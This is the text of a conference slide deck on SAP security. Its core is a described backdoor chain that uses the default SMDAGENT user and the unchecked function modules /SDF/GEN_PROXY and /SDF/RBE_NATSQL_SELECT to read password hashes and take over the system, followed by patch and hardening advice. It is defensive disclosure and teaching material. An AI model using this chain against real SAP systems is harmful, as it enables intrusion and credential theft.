Introduction

Whoami

Topics

- Jamesbond-kind-of-spionage; it’s real- A practical example of a backdoor - SAP Hana security- SAP Security baseline

Not a sexy topic

SAP Security, not allways a sexy topic. But….

007, Secret service activities

• Corporate espionage

• State-sponsored espionage

• ‘Regular’ Cybercrime

• Political motivated cybercrime

• Backdoors

Jamesbond-kind-of-spionage, it’s real

It’s China… they say…

SAP and backdoors?

SAP building backdoors for the NSA. Far fetched? Yes, strongly denied by SAP and in my believe also not true.

But what if there are backdoors SAP or customers are no aware of…. A practical example…

The challenge:

In order to effectively secure an SAP platform, you need to understand and secure all of its systems, components, infrastructure layers and related vulnerabilities and threats.

To break a SAP platform you only need one flaw/vulnerability!

If you are the good guy, you have to work harder!

But first… The challenge

A backdoor into SAP; you need one of these 3

So, to fully compromise an SAP system we need at leastone of the following:

• Gain SAP_ALL rights on application layer

• Get access to the Operating system as <sid>adm

• Get access to the Database, in particular the SAP scheme

Getting access to one of the above means you have access to all three.

A backdoor into SAP…

In this scenario we will combine 3 vulnerabilities:

1. A Default user with default password for Diagnostics purposes

2. A Remote wrapper to execute local function modules remotely without authorization check

3. A Local function module to execute native SQL without authorization check

Business risk: Leads to a full compromise

of your business critical data

1

2

3

Some details on the 3 vulnerabilities

1. Default user with default password for Diagnostics purposes

• User SMDAGENT_<SID> is used by the Wily host agent for gathering diagnostics

• It gets created via the Solution Manager “Managed System Configuration” in solman 7.0

• Exists not only in Solution Manager, but also in backend systems

2. Local function to execute native SQL without authorization check

• Function Module /SDF/RBE_NATSQL_SELECT can be used to execute native SQL

• Lacks authorization check

3. Remote wrapper without authorization check

• Function Module /SDF/GEN_PROXY can be used to execute local Function Modules remotely

• Lacks authorization check

Select password hashes from the database

Brute force privileged SAP accounts

Gain access to the SAP Solution Manager

Demo

Post-exploitation

From there?

• Use (trusted) RFC’s to the world

• Use your imagination

• And take over the world

Try and take over the world!

Mitigation

How to protect?

Change password or delete user SMDAGENT_<SID>

Apply OSS note 1774432 (CVSS score 4.6)

Apply OSS note 1727914 (CVSS score 7.5)

Monitoring / logging

Also see the SAP Whitepaper

https://scn.sap.com/docs/DOC-60424

Something about Hana Security…

0

2

4

6

8

10

12

14

16

18

20112012

20132014

2015

SAP HANA Security notes

With great power comes great responsibility

Running Hana? Better patch…

SAP Security baseline

SAP Security baseline template

• Helps you when defining a SAP Security baseline

• Contains many settings to check

• Not only on SAP application level, but also includes Database, Operating System, network and frontend level

The baseline can be accessed

on the SAP Support site at

https://support.sap.com/sos

-> Media Library

-> Security Baseline Template.

Concluding

What I hope you learned today:

• SAP Security can be sexy

• Defenders have to work harder

• Don’t forget the systems of the ‘techies’ as the SAP Solution Manager is a critical component when it comes to security

• Patch, patch, patch

• Check the SAP Teched Materials!

• Read and make use of the SAP Security Baseline document

Questions?

Website: www.erp-sec.com

Twitter: @jvis @erpsec

Need more info? Contact us...

SAP, R/3, ABAP, SAP GUI, SAP NetWeaver and other SAP products and services mentioned herein as well as their respective logos are trademarks or registered trademarks of SAP AG in Germany and other countries.

All other product and service names mentioned are the trademarks of their respective companies. Data contained in this document serves informational purposes only.

The authors assume no responsibility for errors or omissions in this document. The authors do not warrant the accuracy or completeness of the information, text, graphics, links, or other items contained within this material. This document is provided without a warranty of any kind, either express or implied, including but not limited to the implied warranties of merchantability, fitness for a particular purpose, or non-infringement.

The authors shall have no liability for damages of any kind including without limitation direct, special, indirect, or consequential damages that may result from the use of this document.

SAP AG is neither the author nor the publisher of this publication and is not responsible for its content, and SAP Group shall not be liable for errors or omissions with respect to the materials.

No part of this document may be reproduced without the prior written permission of ERP Security BV. © 2013 ERP Security BV.

Disclaimer

Thank you!